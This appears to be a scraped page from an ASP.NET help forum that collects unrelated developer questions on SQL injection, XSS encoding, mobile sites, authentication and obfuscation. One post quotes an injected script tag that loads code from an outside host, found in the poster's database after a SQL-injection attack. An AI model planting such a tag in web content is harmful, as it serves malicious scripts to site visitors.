I have develop one website in asp and access. But now a day it is facing a problem of sql injection. So how can I protect the .asp pages from sql injection. I have gone through some of the post and get that some function have to written to overcome the sql injection.Function as below...
[Code]....
I use SqlWebEventProvider to log the exceptions to sql server, and it works fine.
I also want to log custom exceptions to aspnet_WebEvent_Events table programmatically. Similar to - [URL]
WebBaseEvent.Raise(new WebErrorEvent("My Error message", null, 5000, e)); I get an error saying "Cannot access constructor 'WebErrorEvent' here due its protection level.
i almost finished my website
but i am afraid of sql injection to my website
how i can protect my self against this injection ...?
In my DB some tag will get automatically concatenate with original value, this will happen in few tables and in few columns(nvarchar type).What will i do for avoiding this.Here is that tag:
</title><script src=http://lizamoon.com/ur.php></script>
I will like to add Rhino Service Bus to my ASP.NET web application but using Ninject as the DI Container. So far all examples I keep seeing use Castle Windsor which I don't want to use since we already use Ninject.Are there any tutorials out there which show how to add Rhino Service Bus to an ASP.NET web application without a direct dependency on Castle Windsor (e.g. using Ninject)?
View 1 RepliesIs .net framework free, If i want to develop a website using asp.net do i need to purchase a license to deploy my website?
View 2 RepliesIs there any tool available for developing mobile websites using asp.net (C#). or else any other tool?
View 4 RepliesI am developing a web site using ASP.Net and c#. I need to design a site map for the web site.
View 2 RepliesI am using 51Degrees.mobi to detect if the mobile browser, resolution, screensize and etc.
The problem is that there are so many phones with so many screen size, and I need to customize foe each phone its own page.
I have a site that holds some movies for mobile (3gp extensions).
I am looking for the easiest way to right a webpage only once, and to be 100% sure it feets all the mobile browsers :
I am going to develop a website in ASP.NET in which users can submit article for this i need a CMS(Content management system ) to handle their article and users comment. which CMS will we good and simple.
View 8 Repliesi am developing a mobile website ... and the target devices are windows mobile or black berry... following is my form code...
[Code]....
i have uploaded the site to the server .... when i try to access the site... it is showing the 404 error... but working in Windows Mobile simulator with out any error
I've got a requirement to develop a Multilingual webform (Chinese, Spanish, Portugese, Russian etc). I am using VS 2005, .NET Framework 2, C# laungauge, SQL 2005.
View 5 RepliesHow i develop multi language website in asp.net for this what steps i need if i already have sqlserver db,design template, requirements stuff and application flow
View 9 Replieshow to write htm code as a result my website will be resolution independent and it will show same in any resolution and any pc monitor size.
View 4 RepliesHow to develop program/website and minimize DB dependencies using C#.NET? For example I have made some changes in my DB, after that I must rewrite half a project.
View 2 RepliesI am trying to develop a image slideshow for the front of my website.I have an idea of how I would like it to look like .... http://www.reef.com/guys/But I have not been able to find any similar pre-built slideshows.I would like to be able to have a loading gif and buttons down the bottom allowing to scroll through the images at your own pace but still letting the images slide without clicking.I am unsure how I would go about making a slideshow like this one, would I use AJAX, jQuery or Silverlight?If you know of any pre built solutions that are similar to what I am looking for provide the link for me or if you have any knowlege
View 6 RepliesI need to develop the forums module in a website. Now i am able to post the forums but how to track the record like comments posted by the viewers.
View 1 Repliessend me some tutorial links to develop a module based website and admin can enable disable any modules.
View 2 RepliesI am trying to develop the nerddinner mvc website, so I downloaded Visual Studio 2010 Express but I do not see an option for MVC or even asp.net website. Can I download this for Visual Studio?
View 2 RepliesI want to have a PHP login form on my website. When the user enters a username and password and clicks submit, they should be directed to a remote website logged in (therefore skipping the login form on the remote site).
As mentioned in the title, the remote site is built using ASP.NET.
I've tried to search for a solution this but really not finding.
I'm trying to see what is the best way to include some protection against XSS in a web app but it needs to be easy for the developer!
Let me explain. I'm going to provide a library for the developers which will include the security controls. I'm thinking I have two choices:
1) Include some HTML encoding functions in that library e.g. AntiXSS and let the developer call the function every time he needs to output something
e.g.
Response.Write(AntiXss.HtmlEncode(value));
2) Create a new write method
Response.Writesecure(value)
The writesecure method would then call the appropriate functions and it would be transparent to the developer.
Additionally, I can write some easy code analyis scripts that will identify the use of the standard Write method...
I am working on a very basic ASP.Net 2.0 website that will have a backend based on SQL Server 2005. The website has three basic pages (Home, About, and Contact) that are fully viewable by everyone. However, there is a fourth page called "Employee Login" that must present a Login/Password system to the visitor of the page. Upon successful login, a few more pages shall become accessible to authenticated users only.I need the simplest Form based authentication here however; the User Names and their Passwords are going to be coming from the SQL Database. Setting up the authentication to Form simply locks out the whole website. I need the basic pages to be login-free. Only certain pages need a login.
View 3 RepliesI have tried many protectors and obfuscators on my projects but havent anyone that works well. I know there isnt any protection that cannot be cracked but there must be some that is hard = requiring alot of time for the cracker, perhaps too much time so they skip trying?
Another problem with protection is that they often show false AV alerts which scare away many potential customers.
In my last .NET project I used .Net Protector which seems to be working well so far but the problem is that it shows false AV Alerts also what concerns me a little about this protection is that the protector itself have been cracked, check here: [LINK REMOVED BY MODERATOR] .
What protection to use for C#, .NET or C++ as it is these languages I mainly work with.
I have create a class SqlHelper in window console client project, then test it it works fine. In my SqlHelper class I make all methods are public static. Then I created an assembly, add it to my unit testing project. Whne I try to access the public function of SqlHelper class, I got error like "Error 1 'CreateDatabase.SqlHelper' is inaccessible due to its protection level ".
Here is my class:
[Code]....
at this line: SqlHelper.setUpTestDatabase I got above error, Where goes wrong?
I wrote a small web service (asmx) to write stuff to a file on the server. It works fine when run in the VS2008 test container. But when I run it under IIS on a remote machine, I get:
System.IO.DirectoryNotFoundException: Could not find a part of the path 'y:grahammiscprops.txt'.
'y' is a mounted drive on both the test and remote machines. The path really does exist. It works on the test machine; not remotely. So:
Is it the fact that 'y' is a mounted drive causing it to fail remotely? or Is it the fact the the path lies outside of the web application directory structure? Is there something I should put in web.config??; or
Is something else the problem? I would have thought that the service running on the server could do anything it wanted! It's not denying me access to the file; it's saying it can't find it??!!
